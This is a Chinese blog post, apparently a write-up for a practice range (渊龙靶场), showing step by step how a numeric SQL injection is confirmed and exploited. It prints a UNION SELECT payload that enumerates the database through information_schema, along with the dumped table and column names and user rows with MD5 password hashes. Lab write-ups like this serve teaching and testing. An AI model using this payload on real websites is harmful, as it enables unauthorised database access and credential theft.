当前位置: 首页 > web >正文

渊龙靶场-sql注入(数字型注入)

web 2025/7/13 10:07:53

1.开局请求抓包

测试点如上图,测试注入,存在注入。

2.查询列数

我们再查他多少列 ,最后测试为为2列。

3.查询回显位

发现均可以回显

4.查询表 

插入语句查询表和数据库

union select database(),group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() --+ 

得到数据库和表

库:s2747857  表:httpinfo,member,message,users,xssblind

5.查询列: 

然后就找列:

user表:id,username,password,level

httpinfo表:id,userid,ipaddress,useragent,httpaccept,remoteport

member表:id,username,pw,sex,phonenum,address,email

message表:id,content,time

xssblind表:id,time,content,name

6.查询值

因为库,表,字段均已知了,所以直接查询就好了

这里查询user表字段吧。 id,username,password,level

1admine10adc3949ba59abbe56e057f20f883e1,2pikachu670b14728ad9902aecba32e22fa4f6bd2,3teste99a18c428cb38d5f260853678922e033

到此就结束了。

http://www.xdnf.cn/news/10700.html

相关文章:

  • 快乐大冒险:解锁身体里的 “快乐密码”
  • 力扣刷题Day 68:搜索插入位置(35)
  • 如何在 Windows 11 24H2 的任务栏时钟中显示秒数
  • js的时间循环的讲解
  • 100V离线语音通断器
  • java笔记08
  • 15-2021剑侠情缘2-各种修复完善+虚拟机单机端+外网服务端整理+文本教程+视频教程
  • Linux服务器安装GUI界面工具
  • 【数据集】NCAR CESM Global Bias-Corrected CMIP5 Output to Support WRF/MPAS Research
  • Redis部署架构详解:原理、场景与最佳实践
  • Java函数式编程(中)
  • 第十二节:第五部分:集合框架:Set集合的特点、底层原理、哈希表、去重复原理
  • 《QDebug 2025年5月》
  • 基于大模型的急性乳腺炎全病程风险预测与综合治疗方案研究
  • Playwright Python API 测试:从入门到实践
  • 滑动窗口 -- 灵神刷题
  • C# 异常处理进阶:精准获取错误行号的通用方案
  • ubuntu安装devkitPro
  • 什么算得到?什么又算失去?
  • ps曝光度调整
  • 继承(全)
  • 2024年数维杯国际大学生数学建模挑战赛D题城市弹性与可持续发展能力评价解题全过程论文及程序
  • YOLOv10改进|爆改模型|涨点|C2F引入空间和通道注意力模块暴力涨点(附代码+修改教程)
  • 九(4).存在指针的引用,不存在引用的指针
  • uniapp-商城-77-shop(8.2-商品列表,地址信息添加,级联选择器picker)
  • window ollama部署模型
  • 2025年主流编程语言全面分析与学习指南
  • 【MySQL】使用C语言连接数据库
  • Linux内核体系结构简析
  • 长尾关键词布局与SEO实战策略